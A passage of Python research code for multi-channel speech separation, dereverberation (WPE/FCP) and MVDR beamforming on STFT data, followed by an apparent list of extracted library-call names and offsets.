self.window = STFT_args['window']
self.nperseg = STFT_args['length']
self.noverlap = STFT_args['overlap']
self.num_spks = num_spks
self.num_ch = num_ch
self.device = device
self.cudaUse = cudaUse
self.pickle_dir = list(Path(pickle_dir).glob('**/**/**/**/*.pickle'))
hann_win = scipy.signal.get_window('hann', self.nperseg)
self.scale = np.sqrt(1.0 / hann_win.sum()**2)
self.check_audio = check_audio
self.ref_ch = ref_ch
self.dereverb_flag = dereverb_Info[0]
self.predictionType = dereverb_Info[1]
self.tapDelay = dereverb_Info[2]
self.nTap = dereverb_Info[3]
self.reverb_variance_flowValue = dereverb_Info[4]
# self.pickle_dir = self.pickle_dir[0:10]
# # check chunked audio signal
# MAX_INT16 = np.iinfo(np.int16).max
# test= ref2 * MAX_INT16
# test = test.astype(np.int16)
# wf.write('sample_ref2.wav',16000,test)
def STFT(self,time_sig):
'''
input : [T,Nch]
output : [Nch,F,T]
'''
assert time_sig.shape[0] > time_sig.shape[1], "Please check the STFT input dimension, input = [T,Nch] "
num_ch = time_sig.shape[1]
for num_ch in range(num_ch):
# scipy.signal.stft : output : [F range, T range, FxT components]
_,_,stft_ch = signal.stft(time_sig[:,num_ch],fs=self.fs,window=self.window,nperseg=self.nperseg,noverlap=self.noverlap)
# output : [FxT]
stft_ch = np.expand_dims(stft_ch,axis=0)
if num_ch == 0:
stft_chcat = stft_ch
else:
stft_chcat = np.append(stft_chcat,stft_ch,axis=0)
return stft_chcat
def __getitem__(self,index):
with open(self.pickle_dir[index], 'rb') as f:
data_infos = pickle.load(f)
f.close()
mix = data_infos['mix']
mix_stft = self.STFT(mix)
mix_stft = mix_stft/self.scale # scale equality between scipy stft and matlab stft
##################### Todo #########################################################################################################
###################### reference ch로 하도록 mix stft, ref_stft등 circular shift 해야됨.
##############################################################################################################################
assert self.num_spks+1 == len(data_infos), "[ERROR] Check the number of speakers"
ref_stft = [[] for spk_idx in range(self.num_spks)]
for spk_idx in range(self.num_spks):
ref_sig = data_infos['ref'+str(spk_idx+1)]
if len(ref_sig.shape) == 1:
ref_sig = np.expand_dims(ref_sig,axis=1)
ref_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(ref_sig)),[0,2,1])
ref_stft[spk_idx] = ref_stft[spk_idx]/self.scale # scale equality between scipy stft and matlab stft
# numpy to torch & reshpae [C,F,T] ->[C,T,F]
mix_stft = torch.permute( torch.from_numpy(mix_stft),[0,2,1])
if self.functionMode == 'Separate':
"""
Output :
mix_stft : [Mic,T,F]
ref_stft : [Mic,T,F]
"""
return torch.roll(mix_stft,-self.ref_ch,dims=0), torch.roll(ref_stft,-self.ref_ch,dims=0)
elif self.functionMode == 'Beamforming':
"""
Output :
mix_stft : [Mic,T,F]
ref_stft : [Mic,T,F]
"""
BeamOutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','Beamforming')
MISO1OutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','MISO1')
return mix_stft, ref_stft, BeamOutSaveDir, MISO1OutSaveDir
elif 'Enhance' in self.functionMode:
"""
Output :
mix_stft : [Mic,T,F]
ref_stft_1ch, list, [Mic,T,F]
MISO1_stft, list, [Mic,T,F]
Beamform_stft, list, [Mic,T,F]
"""
if len(mix_stft.shape)==3:
mix_stft = torch.unsqueeze(mix_stft,dim=0)
if self.cudaUse:
mix_stft = mix_stft.cuda(self.device)
ref_stft_1ch = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
if len(ref_stft[spk_idx].shape) == 3:
ref_stft[spk_idx] = torch.unsqueeze(ref_stft[spk_idx], dim=0)
ref_stft_1ch[spk_idx] = ref_stft[spk_idx][:,self.ref_ch,:,:] # select reference mic channel
ref_stft_1ch[spk_idx] = torch.unsqueeze(ref_stft_1ch[spk_idx], dim=1)
B, Mic, T, F = mix_stft.size()
"""
Apply Source Separation
"""
if self.functionMode == 'Enhance_Load_MISO1_Output' or self.functionMode == 'Enhance_Load_MISO1_MVDR_Output':
MISO1OutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','MISO1')
MISO1_stft = [[] for _ in range(self.num_spks)]
# Load MISO1 Output
for spk_idx in range(self.num_spks):
spk_name = '_s{}.wav'.format(spk_idx+1)
MISO1_sig, fs = librosa.load(MISO1OutSaveDir.replace('.pickle',spk_name), mono= False, sr= 8000)
if MISO1_sig.shape[1] != self.num_ch:
MISO1_sig = MISO1_sig.T
assert fs == self.fs, 'Check sampling rate'
if len(MISO1_sig.shape) == 1:
MISO1_sig = np.expand_dims(MISO1_sig, axis=1)
MISO1_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(MISO1_sig)),[0,2,1])
MISO1_stft[spk_idx] = MISO1_stft[spk_idx]/self.scale
# MISO1_spk1 = torch.unsqueeze(MISO1_stft[0],dim=0)
# MISO1_spk2 = torch.unsqueeze(MISO1_stft[1],dim=0)
else:
MISO1_stft = self.MISO1_Inference(mix_stft, ref_ch = self.ref_ch)
if self.cudaUse:
mix_stft = mix_stft.detach().cpu()
for spk_idx in range(self.num_spks):
MISO1_stft[spk_idx] = MISO1_stft[spk_idx].detach().cpu()
"""
Source Alignment between Clean reference signal and MISO1 signal
calculate magnitude distance between ref mic(ch0) and target signal(reference mic : ch0)
"""
for spk_idx in range(self.num_spks):
if spk_idx == 0 :
ref_ = ref_stft_1ch[spk_idx]
s_MISO1 = MISO1_stft[spk_idx][:,0,:,:] # [B,T,F]
else:
ref_ = torch.cat((ref_,ref_stft_1ch[spk_idx]), dim=1)
s_MISO1 = torch.stack((s_MISO1, MISO1_stft[spk_idx][:,0,:,:]), dim=1)
s_MISO1_ = torch.unsqueeze(s_MISO1,dim=2) #[B,Spks,1,T,F]
magnitude_MISO1 = torch.abs(torch.sqrt(s_MISO1_.real**2 + s_MISO1_.imag**2)) #[B,Spks,1,T,F]
s_ref = torch.unsqueeze(ref_, dim=1)
magnitude_distance = torch.sum(torch.abs(magnitude_MISO1 - abs(s_ref)),[3,4])
perms = ref_.new_tensor(list(permutations(range(self.num_spks))), dtype=torch.long) #[[0,1],[1,0]]
index_ = torch.unsqueeze(perms, dim=2)
perms_one_hot = ref_.new_zeros((*perms.size(), self.num_spks), dtype=torch.float).scatter_(2,index_,1)
batchwise_distance = torch.einsum('bij,pij->bp',[magnitude_distance, perms_one_hot])
min_distance_idx = torch.argmin(batchwise_distance, dim=1)
for batch_idx in range(B):
align_index = torch.argmax(perms_one_hot[min_distance_idx[batch_idx]], dim=1)
for spk_idx in range(self.num_spks):
target_index = align_index[spk_idx]
ref_stft_1ch[spk_idx] = torch.unsqueeze(ref_[batch_idx,target_index,...],dim=0)
"""
Apply Dereverberation Method
1. WPE : weighted prediction error
2. ICP : inverse convolutive prediction
3. FCP : forward convolutive prediction
4. cFCP : combine forward convolutive prediction
"""
if self.dereverb_flag :
dereverb_stft = [[] for _ in range(self.num_spks)]
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
if self.predictionType == 'cFCP':
source = [torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy() for spk_idx in range(self.num_spks)]
dereverb_stft = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
elif self.predictionType == 'test':
source = [torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy() for spk_idx in range(self.num_spks)]
dereverb_stft = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
else:
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
#################################
########### Testcode ###########
#################################
# WPE
DNN_WPE_dereverb_stft = [[] for _ in range(self.num_spks)]
FCP_dereverb_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
DNN_WPE_dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,'DNN_WPE',self.tapDelay,self.nTap,self.reverb_variance_flowValue)
# FCP
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
FCP_dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,'FCP',self.tapDelay,self.nTap,self.reverb_variance_flowValue)
#################################
########### Testcode ###########
#################################
"""
Apply MVDR Beamforming
"""
if self.functionMode == 'Enhance_Load_MVDR_Output' or self.functionMode == 'Enhance_Load_MISO1_MVDR_Output':
BeamformSaveDir = str(self.pickle_dir[index]).replace('CleanMix','Beamforming')
Beamform_stft = [[] for _ in range(self.num_spks)]
# Load MISO1 Output
for spk_idx in range(self.num_spks):
spk_name = '_s{}.wav'.format(spk_idx+1)
Beamform_sig, fs = librosa.load(BeamformSaveDir.replace('.pickle',spk_name), mono= False, sr= 8000)
if len(Beamform_sig.shape) == 1:
Beamform_sig = np.expand_dims(Beamform_sig, axis=1)
assert fs == self.fs, 'Check sampling rate'
Beamform_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(Beamform_sig)),[0,2,1])
Beamform_stft[spk_idx] = Beamform_stft[spk_idx]/self.scale
else:
Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
if self.dereverb_flag :
observe = torch.permute(dereverb_stft[spk_idx],[0,3,1,2])
else:
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu()
Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
#################################
########### Testcode ###########
#################################
DNN_WPE_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(DNN_WPE_dereverb_stft[spk_idx],[0,3,1,2])
DNN_WPE_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
FCP_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(FCP_dereverb_stft[spk_idx],[0,3,1,2])
FCP_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
Origin_Beamform_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2])
Origin_Beamform_stft[spk_idx] = self.Apply_Beamforming(source, observe)
#################################
########### Testcode ###########
#################################
if len(mix_stft.shape)== 4:
mix_stft = torch.squeeze(mix_stft)
for spk_idx in range(self.num_spks):
if len(MISO1_stft[spk_idx].shape)== 4:
MISO1_stft[spk_idx] = torch.squeeze(MISO1_stft[spk_idx])
if len(dereverb_stft[spk_idx].shape)==4:
dereverb_stft[spk_idx] = torch.squeeze(dereverb_stft[spk_idx])
if self.check_audio:
''' Check the result of MISO1 '''
self.save_audio(np.transpose(mix_stft, [0,2,1]), 'mix')
for spk_idx in range(self.num_spks):
self.save_audio(np.transpose(ref_stft_1ch[spk_idx], [0,2,1]), 'ref_s{}'.format(spk_idx))
self.save_audio(np.transpose(MISO1_stft[spk_idx], [0,2,1]), 'MISO1_s{}'.format(spk_idx))
if self.dereverb_flag:
self.save_audio(np.transpose(dereverb_stft[spk_idx], [0,2,1]), self.predictionType+'_s{}'.format(spk_idx))
self.save_audio(np.transpose(Beamform_stft[spk_idx], [0,2,1]), self.predictionType+'_Beamform_s{}'.format(spk_idx))
else:
self.save_audio(np.transpose(Beamform_stft[spk_idx], [0,2,1]), 'Beamform_s{}'.format(spk_idx))
#################################
########### Testcode ###########
#################################
#WPE
self.save_audio(np.transpose(np.squeeze(DNN_WPE_dereverb_stft[spk_idx],axis=0), [0,2,1]), 'DNN_WPE_s{}'.format(spk_idx))
self.save_audio(np.transpose(DNN_WPE_Beamform_stft[spk_idx], [0,2,1]), 'DNN_WPE_Beamform_s{}'.format(spk_idx))
#FCP
self.save_audio(np.transpose(np.squeeze(FCP_dereverb_stft[spk_idx],axis=0), [0,2,1]), 'FCP_s{}'.format(spk_idx))
self.save_audio(np.transpose(FCP_Beamform_stft[spk_idx], [0,2,1]), 'FCP_Beamform_s{}'.format(spk_idx))
#Origin Beamforming
self.save_audio(np.transpose(Origin_Beamform_stft[spk_idx], [0,2,1]), 'Origin_Beamform_s{}'.format(spk_idx))
#################################
########### Testcode ###########
#################################
pdb.set_trace()
return mix_stft, ref_stft_1ch, MISO1_stft, Beamform_stft
else:
assert -1, '[Error] Choose correct train mode'
def save_audio(self,signal, wavname):
'''
Input:
signal : [Ch,F,T]
wavename : str, wav name to save
'''
hann_win = scipy.signal.get_window(self.window, self.nperseg)
scale = np.sqrt(1.0 / hann_win.sum()**2)
MAX_INT16 = np.iinfo(np.int16).max
signal = signal * scale
t_sig = self.ISTFT(signal)
t_sig= t_sig * MAX_INT16
t_sig = t_sig.astype(np.int16)
sf.write('{}.wav'.format(wavname),t_sig.T, self.fs,'PCM_24')
def ISTFT(self,FT_sig):
'''
input : [F,T]
output : [T,C]
'''
# if FT_sig.shape[1] != self.config['ISTFT']['length']+1:
# FT_sig = np.transpose(FT_sig,(0,1)) # [C,T,F] -> [C,F,T]
_, t_sig = signal.istft(FT_sig,fs=self.fs, window=self.window, nperseg=self.nperseg, noverlap=self.noverlap) #[C,F,T] -> [T,C]
return t_sig
def MISO1_Inference(self,mix_stft,ref_ch=0):
"""
Input:
mix_stft : observe STFT, size - [B, Mic, T, F]
Output:
MISO1_stft : list of separated source, - [B, reference Mic, T, F]
1. circular shift the microphone array at run time for the prediction of each microphone signal
If the microphones are arranged uniformly on a circle, Select the reference microphone by circular shifting the microphone. e.g reference mic q -> [Yq, Yq+1, ..., Yp, Y1, ..., Yq-1]
2. Using Permutation Invariance Alignmnet method to match between clean target signal and estimated signal
"""
B, M, T, F = mix_stft.size()
MISO1_stft = [torch.empty(B,M,T,F, dtype=torch.complex64) for _ in range(self.num_spks)]
Mic_array = [x for x in range(M)]
Mic_array = np.roll(Mic_array, -ref_ch) # [ref_ch, ref_ch+1, ..., 0, 1, ..., ref_ch-1]
# print('Mic_array : ', Mic_array)
with torch.no_grad():
mix_stft_refCh = torch.roll(mix_stft,-ref_ch, dims=1)
MISO1_refCh = self.model(mix_stft_refCh)
for spk_idx in range(self.num_spks):
MISO1_stft[spk_idx][:,ref_ch,...] = MISO1_refCh[:,spk_idx,...]
# MISO1_spk1[:,ref_ch,...] = MISO1_refCh[:,0,...]
# MISO1_spk2[:,ref_ch,...] = MISO1_refCh[:,1,...]
s_MISO1_refCh = torch.unsqueeze(MISO1_refCh, dim=2)
s_Magnitude_refCh = torch.abs(torch.sqrt(s_MISO1_refCh.real**2 + s_MISO1_refCh.imag**2)) # [B,Spks,1,T,F]
with torch.no_grad():
for shiftIdx in Mic_array[1:]:
# print('shift Micnumber', shiftIdx)
mix_stft_shift = torch.roll(mix_stft,-shiftIdx, dims=1)
MISO1_chShift = self.model(mix_stft_shift)
s_MISO1_chShift = torch.unsqueeze(MISO1_chShift, dim=1) #[B,1,Spks,T,F]
s_magnitude_chShift = torch.sum(torch.abs(s_Magnitude_refCh - abs(s_MISO1_chShift)),[3,4]) #[B,Spks,Spks,T,F]
perms = MISO1_chShift.new_tensor(list(permutations(range(self.num_spks))), dtype=torch.long)
index_ = torch.unsqueeze(perms, dim=2)
perms_one_hot = MISO1_chShift.new_zeros((*perms.size(), self.num_spks), dtype=torch.float).scatter_(2,index_,1)
batchwise_distance = torch.einsum('bij,pij->bp', [s_magnitude_chShift, perms_one_hot])
min_distance_idx = torch.argmin(batchwise_distance,dim=1)
for batch_idx in range(B):
align_index = torch.argmax(perms_one_hot[min_distance_idx[batch_idx]],dim=1)
for spk_idx in range(self.num_spks):
target_index = align_index[spk_idx]
MISO1_stft[spk_idx][:,shiftIdx,...] = MISO1_chShift[batch_idx,target_index,...]
return MISO1_stft
def Apply_Beamforming(self, source_stft, mix_stft, epsi=1e-6):
"""
Input :
mix_stft : observe STFT, size - [B, F, Ch, T], np.ndarray
source_stft : estimated source STFT, size - [B, F, Ch, T], np.ndarray
Output :
Beamform_stft : MVDR Beamforming output, size - [B, 1, T, F], np.ndarray
1. estimate target steering using EigenValue decomposition
2. get source, noise Spatial Covariance Matrix, S = 1/T * xx_h
3. MVDR Beamformer
"""
B, F, M, T = source_stft.shape
# Apply small Diagonal matrix to prevent matrix inversion error
eye = np.eye(M)
eye = eye.reshape(1,1,M,M)
delta = epsi * np.tile(eye,[B,F,1,1])
''' Source '''
source_SCM = self.get_spatial_covariance_matrix(source_stft,normalize=True) # target covariance matrix, size : [B,F,C,C]
source_SCM = 0.5 * (source_SCM + np.conj(source_SCM.swapaxes(-1,-2))) # verify hermitian symmetric
''' Noise Spatial Covariance '''
noise_signal = mix_stft - source_stft
# s1_noise_signal = mix_stft #MPDR
noise_SCM = self.get_spatial_covariance_matrix(noise_signal,normalize = True) # noise covariance matrix, size : [B,F,C,C]
# s1_SCMn = self.condition_covariance(s1_SCMn, 1e-6)
# s1_SCMn /= np.trace(s1_SCMn, axis1=-2, axis2= -1)[...,None, None]
noise_SCM = 0.5 * (noise_SCM + np.conj(noise_SCM.swapaxes(-1,-2))) # verify hermitian symmetric
''' Get Steering vector : Eigen-decomposition '''
shape = source_SCM.shape
source_steering = np.empty(shape[:-1], dtype=np.complex)
# s1_SCMs += delta
source_SCM = np.reshape(source_SCM, (-1,) + shape[-2:])
eigenvals, eigenvecs = np.linalg.eigh(source_SCM)
# Find max eigenvals
vals = np.argmax(eigenvals, axis=-1)
# Select eigenvec for max eigenval
source_steering = np.array([eigenvecs[i,:,vals[i]] for i in range(eigenvals.shape[0])])
# s1_steering = np.array([eigenvecs[i,:,vals[i]] * np.sqrt(Mic/np.linalg.norm(eigenvecs[i,:,vals[i]])) for i in range(eigenvals.shape[0])]) # [B*F,Ch,Ch]
source_steering = np.reshape(source_steering, shape[:-1]) # [B,F,Ch]
source_SCM = np.reshape(source_SCM, shape)
''' steering normalize with respect to the reference microphone '''
# ver 1
source_steering = source_steering / np.expand_dims(source_steering[:,:,0], axis=2)
for b_idx in range(0,B):
for f_idx in range(0,F):
# s1_steering[b_idx,f_idx,:] = s1_steering[b_idx,f_idx,:] / s1_steering[b_idx,f_idx,0]
source_steering[b_idx,f_idx,:] = source_steering[b_idx,f_idx,:] * np.sqrt(M/(np.linalg.norm(source_steering[b_idx,f_idx,:])))
# ver 2
# s1_steering = self.normalize(s1_steering)
source_steering = self.PhaseCorrection(source_steering)
beamformer = self.get_mvdr_beamformer(source_steering, noise_SCM, delta)
# s1_beamformer = self.blind_analytic_normalization(s1_beamformer,s1_SCMn)
source_bf = self.apply_beamformer(beamformer,mix_stft)
source_bf = torch.permute(torch.from_numpy(source_bf), [0,2,1])
return source_bf
def get_spatial_covariance_matrix(self,observation,normalize):
'''
Input :
observation : complex
size : [B,F,C,T]
Return :
R : double
size : [B,F,C,C]
'''
B,F,C,T = observation.shape
R = np.einsum('...dt,...et-> ...de', observation, observation.conj())
if normalize:
normalization = np.sum(np.ones((B,F,1,T)),axis=-1, keepdims=True)
R /= normalization
return R
def PhaseCorrection(self,W): #Matlab과 동일
"""
Phase correction to reduce distortions due to phase inconsistencies.
Input:
W : steering vector
size : [B,F,Ch]
"""
w = W.copy()
B, F, Ch = w.shape
for b_idx in range(0,B):
for f in range(1, F):
w[b_idx,f, :] *= np.exp(-1j*np.angle(
np.sum(w[b_idx,f, :] * w[b_idx,f-1, :].conj(), axis=-1, keepdims=True)))
return w
def condition_covariance(self,x,gamma):
"""see https://stt.msu.edu/users/mauryaas/Ashwini_JPEN.pdf (2.3)"""
B,F,_,_ = x.shape
for b_idx in range(0,B):
scale = gamma * np.trace(x[b_idx,...]) / x[b_idx,...].shape[-1]
scaled_eye = np.eye(x.shape[-1]) * scale
x[b_idx,...] = (x[b_idx,...]+scaled_eye) / (1+gamma)
return x
def normalize(self,vector):
B,F,Ch = vector.shape
for b_idx in range(0,B):
for ii in range(0,F):
weight = np.matmul(np.conjugate(vector[b_idx,ii,:]).reshape(1,-1), vector[b_idx,ii,:])
vector[b_idx,ii,:] = (vector[b_idx,ii,:] / weight)
return vector
def blind_analytic_normalization(self,vector, noise_psd_matrix, eps=0):
"""Reduces distortions in beamformed ouptput.
:param vector: Beamforming vector
with shape (..., sensors)
:param noise_psd_matrix:
with shape (..., sensors, sensors)
:return: Scaled Deamforming vector
with shape (..., sensors)
"""
nominator = np.einsum(
'...a,...ab,...bc,...c->...',
vector.conj(), noise_psd_matrix, noise_psd_matrix, vector
)
nominator = np.abs(np.sqrt(nominator))
denominator = np.einsum(
'...a,...ab,...b->...', vector.conj(), noise_psd_matrix, vector
)
denominator = np.abs(denominator)
normalization = nominator / (denominator + eps)
return vector * normalization[..., np.newaxis]
def get_mvdr_beamformer(self, steering_vector, R_noise, delta):
"""
Returns the MVDR beamformers vector
Input :
steering_vector : Acoustic transfer function vector
shape : [B, F, Ch]
R_noise : Noise spatial covariance matrix
shape : [B, F, Ch, Ch]
"""
R_noise += delta
numer = solve(R_noise, steering_vector)
denom = np.einsum('...d,...d->...', steering_vector.conj(), numer)
beamformer = numer / np.expand_dims(denom, axis=-1)
return beamformer
def apply_beamformer(self, beamformer, mixture):
return np.einsum('...a,...at->...t',beamformer.conj(), mixture)
def __len__(self):
return len(self.pickle_dir)
| [
"numpy.trace",
"numpy.sqrt",
"torch.sqrt",
"numpy.iinfo",
"torch.from_numpy",
"convolutive_prediction.Apply_ConvolutivePrediction",
"torch.squeeze",
"numpy.linalg.norm",
"scipy.signal.get_window",
"numpy.reshape",
"pathlib.Path",
"torch.unsqueeze",
"numpy.conjugate",
"numpy.empty",
"torc... | [((1067, 1112), 'scipy.signal.get_window', 'scipy.signal.get_window', (['"""hann"""', 'self.nperseg'], {}), "('hann', self.nperseg)\n", (1090, 1112), False, 'import scipy\n'), ((17637, 17687), 'scipy.signal.get_window', 'scipy.signal.get_window', (['self.window', 'self.nperseg'], {}), '(self.window, self.nperseg)\n', (17660, 17687), False, 'import scipy\n'), ((18248, 18350), 'scipy.signal.istft', 'signal.istft', (['FT_sig'], {'fs': 'self.fs', 'window': 'self.window', 'nperseg': 'self.nperseg', 'noverlap': 'self.noverlap'}), '(FT_sig, fs=self.fs, window=self.window, nperseg=self.nperseg,\n noverlap=self.noverlap)\n', (18260, 18350), False, 'from scipy import signal\n'), ((19264, 19291), 'numpy.roll', 'np.roll', (['Mic_array', '(-ref_ch)'], {}), '(Mic_array, -ref_ch)\n', (19271, 19291), True, 'import numpy as np\n'), ((19808, 19843), 'torch.unsqueeze', 'torch.unsqueeze', (['MISO1_refCh'], {'dim': '(2)'}), '(MISO1_refCh, dim=2)\n', (19823, 19843), False, 'import torch\n'), ((22043, 22052), 'numpy.eye', 'np.eye', (['M'], {}), '(M)\n', (22049, 22052), True, 'import numpy as np\n'), ((23026, 23064), 'numpy.empty', 'np.empty', (['shape[:-1]'], {'dtype': 'np.complex'}), '(shape[:-1], dtype=np.complex)\n', (23034, 23064), True, 'import numpy as np\n'), ((23114, 23156), 'numpy.reshape', 'np.reshape', (['source_SCM', '((-1,) + shape[-2:])'], {}), '(source_SCM, (-1,) + shape[-2:])\n', (23124, 23156), True, 'import numpy as np\n'), ((23189, 23215), 'numpy.linalg.eigh', 'np.linalg.eigh', (['source_SCM'], {}), '(source_SCM)\n', (23203, 23215), True, 'import numpy as np\n'), ((23260, 23289), 'numpy.argmax', 'np.argmax', (['eigenvals'], {'axis': '(-1)'}), '(eigenvals, axis=-1)\n', (23269, 23289), True, 'import numpy as np\n'), ((23617, 23656), 'numpy.reshape', 'np.reshape', (['source_steering', 'shape[:-1]'], {}), '(source_steering, shape[:-1])\n', (23627, 23656), True, 'import numpy as np\n'), ((23689, 23718), 'numpy.reshape', 'np.reshape', (['source_SCM', 'shape'], {}), '(source_SCM, shape)\n', (23699, 23718), True, 'import numpy as np\n'), ((27234, 27253), 'numpy.abs', 'np.abs', (['denominator'], {}), '(denominator)\n', (27240, 27253), True, 'import numpy as np\n'), ((27794, 27825), 'numpy.linalg.solve', 'solve', (['R_noise', 'steering_vector'], {}), '(R_noise, steering_vector)\n', (27799, 27825), False, 'from numpy.linalg import solve\n'), ((2118, 2233), 'scipy.signal.stft', 'signal.stft', (['time_sig[:, num_ch]'], {'fs': 'self.fs', 'window': 'self.window', 'nperseg': 'self.nperseg', 'noverlap': 'self.noverlap'}), '(time_sig[:, num_ch], fs=self.fs, window=self.window, nperseg=\n self.nperseg, noverlap=self.noverlap)\n', (2129, 2233), False, 'from scipy import signal\n'), ((2275, 2306), 'numpy.expand_dims', 'np.expand_dims', (['stft_ch'], {'axis': '(0)'}), '(stft_ch, axis=0)\n', (2289, 2306), True, 'import numpy as np\n'), ((2617, 2631), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (2628, 2631), False, 'import pickle\n'), ((3824, 3850), 'torch.from_numpy', 'torch.from_numpy', (['mix_stft'], {}), '(mix_stft)\n', (3840, 3850), False, 'import torch\n'), ((17757, 17775), 'numpy.iinfo', 'np.iinfo', (['np.int16'], {}), '(np.int16)\n', (17765, 17775), True, 'import numpy as np\n'), ((19118, 19164), 'torch.empty', 'torch.empty', (['B', 'M', 'T', 'F'], {'dtype': 'torch.complex64'}), '(B, M, T, F, dtype=torch.complex64)\n', (19129, 19164), False, 'import torch\n'), ((19397, 19412), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (19410, 19412), False, 'import torch\n'), ((19443, 19480), 'torch.roll', 'torch.roll', (['mix_stft', '(-ref_ch)'], {'dims': '(1)'}), '(mix_stft, -ref_ch, dims=1)\n', (19453, 19480), False, 'import torch\n'), ((19882, 19943), 'torch.sqrt', 'torch.sqrt', (['(s_MISO1_refCh.real ** 2 + s_MISO1_refCh.imag ** 2)'], {}), '(s_MISO1_refCh.real ** 2 + s_MISO1_refCh.imag ** 2)\n', (19892, 19943), False, 'import torch\n'), ((19980, 19995), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (19993, 19995), False, 'import torch\n'), ((22111, 22137), 'numpy.tile', 'np.tile', (['eye', '[B, F, 1, 1]'], {}), '(eye, [B, F, 1, 1])\n', (22118, 22137), True, 'import numpy as np\n'), ((23865, 23913), 'numpy.expand_dims', 'np.expand_dims', (['source_steering[:, :, 0]'], {'axis': '(2)'}), '(source_steering[:, :, 0], axis=2)\n', (23879, 23913), True, 'import numpy as np\n'), ((24630, 24657), 'torch.from_numpy', 'torch.from_numpy', (['source_bf'], {}), '(source_bf)\n', (24646, 24657), False, 'import torch\n'), ((27072, 27090), 'numpy.sqrt', 'np.sqrt', (['nominator'], {}), '(nominator)\n', (27079, 27090), True, 'import numpy as np\n'), ((27930, 27960), 'numpy.expand_dims', 'np.expand_dims', (['denom'], {'axis': '(-1)'}), '(denom, axis=-1)\n', (27944, 27960), True, 'import numpy as np\n'), ((2418, 2456), 'numpy.append', 'np.append', (['stft_chcat', 'stft_ch'], {'axis': '(0)'}), '(stft_chcat, stft_ch, axis=0)\n', (2427, 2456), True, 'import numpy as np\n'), ((3492, 3523), 'numpy.expand_dims', 'np.expand_dims', (['ref_sig'], {'axis': '(1)'}), '(ref_sig, axis=1)\n', (3506, 3523), True, 'import numpy as np\n'), ((4092, 4134), 'torch.roll', 'torch.roll', (['mix_stft', '(-self.ref_ch)'], {'dims': '(0)'}), '(mix_stft, -self.ref_ch, dims=0)\n', (4102, 4134), False, 'import torch\n'), ((4134, 4176), 'torch.roll', 'torch.roll', (['ref_stft', '(-self.ref_ch)'], {'dims': '(0)'}), '(ref_stft, -self.ref_ch, dims=0)\n', (4144, 4176), False, 'import torch\n'), ((20143, 20182), 'torch.roll', 'torch.roll', (['mix_stft', '(-shiftIdx)'], {'dims': '(1)'}), '(mix_stft, -shiftIdx, dims=1)\n', (20153, 20182), False, 'import torch\n'), ((20276, 20313), 'torch.unsqueeze', 'torch.unsqueeze', (['MISO1_chShift'], {'dim': '(1)'}), '(MISO1_chShift, dim=1)\n', (20291, 20313), False, 'import torch\n'), ((20590, 20619), 'torch.unsqueeze', 'torch.unsqueeze', (['perms'], {'dim': '(2)'}), '(perms, dim=2)\n', (20605, 20619), False, 'import torch\n'), ((20785, 20850), 'torch.einsum', 'torch.einsum', (['"""bij,pij->bp"""', '[s_magnitude_chShift, perms_one_hot]'], {}), "('bij,pij->bp', [s_magnitude_chShift, perms_one_hot])\n", (20797, 20850), False, 'import torch\n'), ((20886, 20925), 'torch.argmin', 'torch.argmin', (['batchwise_distance'], {'dim': '(1)'}), '(batchwise_distance, dim=1)\n', (20898, 20925), False, 'import torch\n'), ((25157, 25178), 'numpy.ones', 'np.ones', (['(B, F, 1, T)'], {}), '((B, F, 1, T))\n', (25164, 25178), True, 'import numpy as np\n'), ((26050, 26069), 'numpy.eye', 'np.eye', (['x.shape[-1]'], {}), '(x.shape[-1])\n', (26056, 26069), True, 'import numpy as np\n'), ((1001, 1017), 'pathlib.Path', 'Path', (['pickle_dir'], {}), '(pickle_dir)\n', (1005, 1017), False, 'from pathlib import Path\n'), ((7817, 7848), 'torch.unsqueeze', 'torch.unsqueeze', (['s_MISO1'], {'dim': '(2)'}), '(s_MISO1, dim=2)\n', (7832, 7848), False, 'import torch\n'), ((8002, 8030), 